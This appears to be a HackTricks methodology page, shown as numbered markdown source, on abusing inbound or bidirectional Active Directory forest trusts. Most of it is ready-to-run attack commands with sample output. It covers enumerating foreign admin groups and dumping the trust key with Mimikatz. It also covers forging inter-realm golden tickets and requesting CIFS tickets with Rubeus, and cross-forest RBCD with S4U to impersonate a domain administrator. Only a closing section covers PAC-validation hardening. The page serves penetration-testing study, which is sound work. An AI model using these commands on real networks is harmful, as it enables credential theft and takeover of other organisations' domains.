external-forest-domain-oneway-inbound.md (8677B)
1 --- 2 title: "External Forest Domain - OneWay (Inbound) or bidirectional" 3 section: "Windows" 4 sectionSlug: "windows-hardening" 5 sourcePath: "src/windows-hardening/active-directory-methodology/external-forest-domain-oneway-inbound.md" 6 sourceUrl: "https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/windows-hardening/active-directory-methodology/external-forest-domain-oneway-inbound.md" 7 sha: "188de82beb54e70956b2952367a0af91d26758b8" 8 isIndex: false 9 modified: true 10 license: "CC-BY-NC-4.0" 11 --- 12 13 # External Forest Domain - OneWay (Inbound) or bidirectional 14 15 In this scenario an external domain is trusting you (or both are trusting each other), so you can get some kind of access over it. 16 17 ## Enumeration 18 19 First of all, you need to **enumerate** the **trust**: 20 21 ```bash 22 Get-DomainTrust 23 SourceName : a.domain.local --> Current domain 24 TargetName : domain.external --> Destination domain 25 TrustType : WINDOWS-ACTIVE_DIRECTORY 26 TrustAttributes : 27 TrustDirection : Inbound --> Inboud trust 28 WhenCreated : 2/19/2021 10:50:56 PM 29 WhenChanged : 2/19/2021 10:50:56 PM 30 31 # Get name of DC of the other domain 32 Get-DomainComputer -Domain domain.external -Properties DNSHostName 33 dnshostname 34 ----------- 35 dc.domain.external 36 37 # Groups that contain users outside of its domain and return its members 38 Get-DomainForeignGroupMember -Domain domain.external 39 GroupDomain : domain.external 40 GroupName : Administrators 41 GroupDistinguishedName : CN=Administrators,CN=Builtin,DC=domain,DC=external 42 MemberDomain : domain.external 43 MemberName : S-1-5-21-3263068140-2042698922-2891547269-1133 44 MemberDistinguishedName : CN=S-1-5-21-3263068140-2042698922-2891547269-1133,CN=ForeignSecurityPrincipals,DC=domain, 45 DC=external 46 47 # Get name of the principal in the current domain member of the cross-domain group 48 ConvertFrom-SID S-1-5-21-3263068140-2042698922-2891547269-1133 49 DEV\External Admins 50 51 # Get members of the cros-domain group 52 Get-DomainGroupMember -Identity "External Admins" | select MemberName 53 MemberName 54 ---------- 55 crossuser 56 57 # Lets list groups members 58 ## Check how the "External Admins" is part of the Administrators group in that DC 59 Get-NetLocalGroupMember -ComputerName dc.domain.external 60 ComputerName : dc.domain.external 61 GroupName : Administrators 62 MemberName : SUB\External Admins 63 SID : S-1-5-21-3263068140-2042698922-2891547269-1133 64 IsGroup : True 65 IsDomain : True 66 67 # You may also enumerate where foreign groups and/or users have been assigned 68 # local admin access via Restricted Group by enumerating the GPOs in the foreign domain. 69 70 # Additional trust hygiene checks (AD RSAT / AD module) 71 Get-ADTrust -Identity domain.external -Properties SelectiveAuthentication,SIDFilteringQuarantined,SIDFilteringForestAware,TGTDelegation,ForestTransitive 72 ``` 73 74 > `SelectiveAuthentication`/`SIDFiltering*` let you quickly see if cross-forest abuse paths (RBCD, SIDHistory) are likely to work without extra prerequisites.<sup>[[2]](#references)</sup> 75 76 In the previous enumeration it was found that the user **`crossuser`** is inside the **`External Admins`** group who has **Admin access** inside the **DC of the external domain**. 77 78 ## Initial Access 79 80 If you **couldn't** find any **special** access of your user in the other domain, you can still go back to the AD Methodology and try to **privesc from an unprivileged user** (things like kerberoasting for example): 81 82 You can use **Powerview functions** to **enumerate** the **other domain** using the `-Domain` param like in: 83 84 ```bash 85 Get-DomainUser -SPN -Domain domain_name.local | select SamAccountName 86 ``` 87 88 89 [.](/hacktricks/windows-hardening/active-directory-methodology/overview) 90 91 ## Impersonation 92 93 ### Logging in 94 95 Using a regular method with the credentials of the users who is has access to the external domain you should be able to access: 96 97 ```bash 98 Enter-PSSession -ComputerName dc.external_domain.local -Credential domain\administrator 99 ``` 100 101 ### SID History Abuse 102 103 You could also abuse [**SID History**](/hacktricks/windows-hardening/active-directory-methodology/sid-history-injection) across a forest trust. 104 105 If a user is migrated **from one forest to another** and **SID Filtering is not enabled**, it becomes possible to **add a SID from the other forest**, and this **SID** will be **added** to the **user's token** when authenticating **across the trust**. 106 107 > [!WARNING] 108 > As a reminder, you can get the signing key with 109 > 110 > ```bash 111 > Invoke-Mimikatz -Command '"lsadump::trust /patch"' -ComputerName dc.domain.local 112 > ``` 113 114 You could **sign with** the **trusted** key a **TGT impersonating** the user of the current domain. 115 116 ```bash 117 # Get a TGT for the cross-domain privileged user to the other domain 118 Invoke-Mimikatz -Command '"kerberos::golden /user:<username> /domain:<current domain> /SID:<current domain SID> /rc4:<trusted key> /target:<external.domain> /ticket:C:\path\save\ticket.kirbi"' 119 120 # Use this inter-realm TGT to request a TGS in the target domain to access the CIFS service of the DC 121 ## We are asking to access CIFS of the external DC because in the enumeration we show the group was part of the local administrators group 122 Rubeus.exe asktgs /service:cifs/dc.domain.external /domain:dc.domain.external /dc:dc.domain.external /ticket:C:\path\save\ticket.kirbi /nowrap 123 124 # Now you have a TGS to access the CIFS service of the domain controller 125 ``` 126 127 ### Full way impersonating the user 128 129 ```bash 130 # Get a TGT of the user with cross-domain permissions 131 Rubeus.exe asktgt /user:crossuser /domain:sub.domain.local /aes256:70a673fa756d60241bd74ca64498701dbb0ef9c5fa3a93fe4918910691647d80 /opsec /nowrap 132 133 # Get a TGT from the current domain for the target domain for the user 134 Rubeus.exe asktgs /service:krbtgt/domain.external /domain:sub.domain.local /dc:dc.sub.domain.local /ticket:doIFdD[...snip...]MuSU8= /nowrap 135 136 # Use this inter-realm TGT to request a TGS in the target domain to access the CIFS service of the DC 137 ## We are asking to access CIFS of the external DC because in the enumeration we show the group was part of the local administrators group 138 Rubeus.exe asktgs /service:cifs/dc.domain.external /domain:dc.domain.external /dc:dc.domain.external /ticket:doIFMT[...snip...]5BTA== /nowrap 139 140 # Now you have a TGS to access the CIFS service of the domain controller 141 ``` 142 143 ### Cross-forest RBCD when you control a machine account in the trusting forest (no SID filtering / selective auth) 144 145 If your foreign principal (FSP) lands you in a group that can write computer objects in the trusting forest (e.g., `Account Operators`, custom provisioning group), you can configure **Resource-Based Constrained Delegation** on a target host of that forest and impersonate any user there: 146 147 ```bash 148 # 1) From the trusted domain, create or compromise a machine account (MYLAB$) you control 149 # 2) In the trusting forest (domain.external), set msDS-AllowedToAct on the target host for that account 150 Set-ADComputer -Identity victim-host$ -PrincipalsAllowedToDelegateToAccount MYLAB$ 151 # or with PowerView 152 Set-DomainObject victim-host$ -Set @{'msds-allowedtoactonbehalfofotheridentity'=$sidbytes_of_MYLAB} 153 154 # 3) Use the inter-forest TGT to perform S4U to victim-host$ and get a CIFS ticket as DA of the trusting forest 155 Rubeus.exe s4u /ticket:interrealm_tgt.kirbi /impersonate:EXTERNAL\Administrator /target:victim-host.domain.external /protocol:rpc 156 ``` 157 158 This only works when **SelectiveAuthentication is disabled** and **SID filtering** does not strip your controlling SID. It is a fast lateral path that avoids SIDHistory forging and is often missed in trust reviews.<sup>[[2]](#references)</sup> 159 160 ### PAC validation hardening 161 162 PAC signature validation updates for **CVE-2024-26248**/**CVE-2024-29056** add signing enforcement on inter-forest tickets. In **Compatibility mode**, forged inter-realm PAC/SIDHistory/S4U paths can still work on unpatched DCs. In **Enforcement mode**, unsigned or tampered PAC data crossing a forest trust is rejected unless you also hold the target forest trust key. Registry overrides (`PacSignatureValidationLevel`, `CrossDomainFilteringLevel`) can weaken this while they remain available.<sup>[[1]](#references)</sup> 163 164 ## References 165 166 - [1] [Microsoft KB5037754 – PAC validation changes for CVE-2024-26248 & CVE-2024-29056](https://support.microsoft.com/en-au/topic/how-to-manage-pac-validation-changes-related-to-cve-2024-26248-and-cve-2024-29056-6e661d4f-799a-4217-b948-be0a1943fef1) 167 - [2] [MS-PAC spec – SID filtering & claims transformation details](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-pac/55fc19f2-55ba-4251-8a6a-103dd7c66280)